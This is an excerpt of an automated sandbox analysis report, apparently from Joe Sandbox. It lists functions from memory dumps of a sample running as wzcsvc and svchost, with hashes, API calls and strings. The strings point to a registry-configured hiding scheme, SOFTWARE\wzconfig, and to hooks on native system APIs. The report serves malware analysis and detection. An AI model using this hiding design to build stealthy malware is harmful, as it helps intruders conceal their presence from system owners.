                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD51AFB2504280C6EF6A8F159448358F7A2F754B9CF1B8126DBD847BD5CB3CEAA9C701
                                                                                                                                                                                                                                                Function 0000023EB69F7980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 855eec9bea59a2a44505d818b18946362405b3b23c99641aa2859ba546260646
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5519D623116008AEF168F15F448B6CE793F345BADF138521EA868B7C8DB7CEA49C700
                                                                                                                                                                                                                                                Function 0000023EB69FA3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 9d06c66aebd6894048cb1681453c73d1c89e9101b7b06a806ab4d09f5b027daa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF61BFB2504BC4C1EB668F15E44439EF7A1F785B98F068215EBD943B99DB7CE298CB00
                                                                                                                                                                                                                                                Function 00007FF6B5AD190C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 1646373207-2227199552
                                                                                                                                                                                                                                                • Opcode ID: 17085d13c6d19adf9107acc6e62bc0cde60057c24e7a9bdea36a2e31f8118abb
                                                                                                                                                                                                                                                • Instruction ID: 83be4bf334405e99d56cc0b8a2a3faf445684c388f6ca6af8a0f52bd6309cded
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17085d13c6d19adf9107acc6e62bc0cde60057c24e7a9bdea36a2e31f8118abb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5D0A744B9560382FE087B6A68540B003505F18F40F440071CE0E95386DE3CD8944200

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:0.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:74
                                                                                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                                                                                execution_graph 15701 21681982750 15704 2168198277e 15701->15704 15702 2168198286c LoadLibraryA 15702->15704 15703 216819828e8 15704->15702 15704->15703 15705 216819b1ac4 15710 216819b1630 GetProcessHeap 15705->15710 15707 216819b1ad3 15708 216819b1ada Sleep SleepEx 15707->15708 15709 216819b15a0 StrCmpIW StrCmpW 15707->15709 15708->15707 15709->15707 15711 216819b1650 __free_lconv_num 15710->15711 15755 216819b1268 GetProcessHeap 15711->15755 15713 216819b1658 15714 216819b1268 2 API calls 15713->15714 15715 216819b1669 15714->15715 15716 216819b1268 2 API calls 15715->15716 15717 216819b1672 15716->15717 15718 216819b1268 2 API calls 15717->15718 15719 216819b167b 15718->15719 15720 216819b1696 RegOpenKeyExW 15719->15720 15721 216819b18ae 15720->15721 15722 216819b16c8 RegOpenKeyExW 15720->15722 15721->15707 15723 216819b16f1 15722->15723 15724 216819b1707 RegOpenKeyExW 15722->15724 15759 216819b12bc RegQueryInfoKeyW 15723->15759 15726 216819b1742 RegOpenKeyExW 15724->15726 15727 216819b172b 15724->15727 15730 216819b1766 15726->15730 15731 216819b177d RegOpenKeyExW 15726->15731 15770 216819b104c RegQueryInfoKeyW 15727->15770 15735 216819b12bc 13 API calls 15730->15735 15732 216819b17a1 15731->15732 15733 216819b17b8 RegOpenKeyExW 15731->15733 15736 216819b12bc 13 API calls 15732->15736 15737 216819b17f3 RegOpenKeyExW 15733->15737 15738 216819b17dc 15733->15738 15739 216819b1773 RegCloseKey 15735->15739 15740 216819b17ae RegCloseKey 15736->15740 15742 216819b182e RegOpenKeyExW 15737->15742 15743 216819b1817 15737->15743 15741 216819b12bc 13 API calls 15738->15741 15739->15731 15740->15733 15744 216819b17e9 RegCloseKey 15741->15744 15746 216819b1852 15742->15746 15747 216819b1869 RegOpenKeyExW 15742->15747 15745 216819b104c 5 API calls 15743->15745 15744->15737 15750 216819b1824 RegCloseKey 15745->15750 15751 216819b104c 5 API calls 15746->15751 15748 216819b18a4 RegCloseKey 15747->15748 15749 216819b188d 15747->15749 15748->15721 15752 216819b104c 5 API calls 15749->15752 15750->15742 15753 216819b185f RegCloseKey 15751->15753 15754 216819b189a RegCloseKey 15752->15754 15753->15747 15754->15748 15776 216819c6168 15755->15776 15757 216819b1283 GetProcessHeap 15758 216819b12ae __free_lconv_num 15757->15758 15758->15713 15760 216819b1327 GetProcessHeap 15759->15760 15761 216819b148a RegCloseKey 15759->15761 15767 216819b133e __free_lconv_num 15760->15767 15761->15724 15762 216819b1352 RegEnumValueW 15762->15767 15763 216819b1476 GetProcessHeap HeapFree 15763->15761 15765 216819b141e lstrlenW GetProcessHeap 15765->15767 15766 216819b13d3 GetProcessHeap 15766->15767 15767->15762 15767->15763 15767->15765 15767->15766 15768 216819b13f3 GetProcessHeap HeapFree 15767->15768 15769 216819b1443 StrCpyW 15767->15769 15778 216819b1534 15767->15778 15768->15765 15769->15767 15771 216819b11b5 RegCloseKey 15770->15771 15774 216819b10bf __free_lconv_num 15770->15774 15771->15726 15772 216819b10cf RegEnumValueW 15772->15774 15773 216819b114e GetProcessHeap 15773->15774 15774->15771 15774->15772 15774->15773 15775 216819b116e GetProcessHeap HeapFree 15774->15775 15775->15774 15777 216819c6177 15776->15777 15779 216819b154e 15778->15779 15782 216819b1584 15778->15782 15780 216819b1565 StrCmpIW 15779->15780 15781 216819b156d StrCmpW 15779->15781 15779->15782 15780->15779 15781->15779 15782->15767

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00000216819B32A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: 801c42961fe1b4382c844234cc78ac710e0d4036b76395ac5b92bddb1c98b79c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 391152707116668EFF60D721B94D7DE62A4BB74705F928029958E867D1EF3CC28C8700
                                                                                                                                                                                                                                                Function 00000216819B1AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: GetProcessHeap.KERNEL32 ref: 00000216819B163B
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: HeapAlloc.KERNEL32 ref: 00000216819B164A
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B16BA
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B16E7
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1701
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1721
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B173C
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B175C
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1777
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1797
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B17B2
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B17D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 00000216819B1ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 00000216819B1AE5
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B17ED
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B180D
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1828
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1848
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1863
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1883
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B189E
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B18A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: 4361e9ea1ed55f9533400fbf40ff2ad1109a8b3fe0009fd101d27c5258330a75
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B331EB75610A3589FF549B26F94C3FD23A4EBA4BC0F1A54319E0D877D9FE24C8998250
                                                                                                                                                                                                                                                Function 0000021681982750 Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: 7e0df477ede2c1cd813b6dc73e6dad918a3dd38986ad8779925cdc41d7265fba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88613332B416908FDF548F15D20C7ADB392FB64BE5F5A8120DE0E07788DA39D826C700
                                                                                                                                                                                                                                                Function 00000216819B3858 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 104 216819b3858-216819b3863 105 216819b3865-216819b3878 StrCmpNIW 104->105 106 216819b387d-216819b3884 104->106 105->106 107 216819b387a 105->107 107->106
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0bcdd8bc399243b85fdbdeadd6d3938df9384e511b8271d9569c855e29d0cd8c
                                                                                                                                                                                                                                                • Instruction ID: eac7c6e31302558f9cdd097af4e8828d4a4db616f8664aa75d1323126e3a1c65
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bcdd8bc399243b85fdbdeadd6d3938df9384e511b8271d9569c855e29d0cd8c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DD0A730702205CEFF24DFA598CD6E92352DB24744F8A4021CD0401200DB29CACDCB11

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00000216819B2B40 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 290 216819b2b40-216819b2bb9 call 216819d2d50 293 216819b2bbf-216819b2bc5 290->293 294 216819b2ef4-216819b2f17 290->294 293->294 295 216819b2bcb-216819b2bce 293->295 295->294 296 216819b2bd4-216819b2bd7 295->296 296->294 297 216819b2bdd-216819b2bed GetModuleHandleA 296->297 298 216819b2c01 297->298 299 216819b2bef-216819b2bff call 216819c6090 297->299 301 216819b2c04-216819b2c22 298->301 299->301 301->294 304 216819b2c28-216819b2c47 StrCmpNIW 301->304 304->294 305 216819b2c4d-216819b2c51 304->305 305->294 306 216819b2c57-216819b2c61 305->306 306->294 307 216819b2c67-216819b2c6e 306->307 307->294 308 216819b2c74-216819b2c87 307->308 309 216819b2c89-216819b2c95 308->309 310 216819b2c97 308->310 311 216819b2c9a-216819b2c9e 309->311 310->311 312 216819b2ca0-216819b2cac 311->312 313 216819b2cae 311->313 314 216819b2cb1-216819b2cbb 312->314 313->314 315 216819b2db1-216819b2db5 314->315 316 216819b2cc1-216819b2cc4 314->316 319 216819b2ee6-216819b2eee 315->319 320 216819b2dbb-216819b2dbe 315->320 317 216819b2cd6-216819b2ce0 316->317 318 216819b2cc6-216819b2cd3 call 216819b19a4 316->318 324 216819b2d14-216819b2d1e 317->324 325 216819b2ce2-216819b2cef 317->325 318->317 319->294 319->308 321 216819b2dc0-216819b2dcc call 216819b19a4 320->321 322 216819b2dcf-216819b2dd9 320->322 321->322 327 216819b2e09-216819b2e0c 322->327 328 216819b2ddb-216819b2de8 322->328 331 216819b2d20-216819b2d2d 324->331 332 216819b2d4e-216819b2d51 324->332 325->324 330 216819b2cf1-216819b2cfe 325->330 337 216819b2e0e-216819b2e17 call 216819b1bc4 327->337 338 216819b2e19-216819b2e26 lstrlenW 327->338 328->327 336 216819b2dea-216819b2df7 328->336 339 216819b2d01-216819b2d07 330->339 331->332 340 216819b2d2f-216819b2d3c 331->340 334 216819b2d5f-216819b2d6c lstrlenW 332->334 335 216819b2d53-216819b2d5d call 216819b1bc4 332->335 342 216819b2d8f-216819b2da1 call 216819b3858 334->342 343 216819b2d6e-216819b2d78 334->343 335->334 346 216819b2da7-216819b2dac 335->346 344 216819b2dfa-216819b2e00 336->344 337->338 355 216819b2e5e-216819b2e69 337->355 348 216819b2e49-216819b2e53 call 216819b3858 338->348 349 216819b2e28-216819b2e32 338->349 339->346 347 216819b2d0d-216819b2d12 339->347 350 216819b2d3f-216819b2d45 340->350 342->346 359 216819b2e56-216819b2e58 342->359 343->342 354 216819b2d7a-216819b2d8d call 216819b1534 343->354 344->355 356 216819b2e02-216819b2e07 344->356 346->359 347->324 347->339 348->359 349->348 360 216819b2e34-216819b2e47 call 216819b1534 349->360 350->346 351 216819b2d47-216819b2d4c 350->351 351->332 351->350 354->342 354->346 362 216819b2ee0-216819b2ee4 355->362 363 216819b2e6b-216819b2e6f 355->363 356->327 356->344 359->319 359->355 360->348 360->355 362->319 368 216819b2e71-216819b2e75 363->368 369 216819b2e77-216819b2e91 call 216819c5090 363->369 368->369 371 216819b2e94-216819b2e97 368->371 369->371 374 216819b2e99-216819b2eb7 call 216819c5090 371->374 375 216819b2eba-216819b2ebd 371->375 374->375 375->362 376 216819b2ebf-216819b2edd call 216819c5090 375->376 376->362
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: fd0c969c2e2ece0eb67fa279b6ab00ffecfa7cfb9d9adfeb4a8a64b150774b0b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFB1AE322106A08AEF68CF26D44C7ED63A4FBA4B84F965016DE0D57B98EF35ED48C340
                                                                                                                                                                                                                                                Function 00000216819B7D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 88af1c4942f722056292f859fc3c676dd385bf963df80e4e7a661ce88c85ece6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F317E72314B808AEF648F60E8883ED7361F794744F45412ADA8E87B98EF38C64CC710
                                                                                                                                                                                                                                                Function 00000216819BD814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: e054e30c0b0b95726b8c33e037f8a02ccd43d39a05ed31de564de1db8a543090
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6318432214F808AEF64CF25E8483EE73A4F799758F510125EA9D43B99DF38C549CB00
                                                                                                                                                                                                                                                Function 00000216819B1630 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                                                                • API String ID: 106492572-440640706
                                                                                                                                                                                                                                                • Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction ID: 8d20cfa4804ab780a92419fc37124bda36b7237033b19598f65d44058a0d936d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4971C976710A518AEF20DF66F89C6DD23B4FBA4B88F421125DA8E57B69EF34C448C740
                                                                                                                                                                                                                                                Function 00000216819B12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: 19148b15e0785c90b7b5efe4d3b42acf1ede0d4496f1639d33d33aeac3e3b708
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3513A76604B848AEB54CF62F54C39EB7A2F799F99F454124DA8A07758EF3CC059C700
                                                                                                                                                                                                                                                Function 00000216819B1D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: 8a70bb770da308128df2406dd91541ab9beca4aee603dab9a1a7320e1fae7a49
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
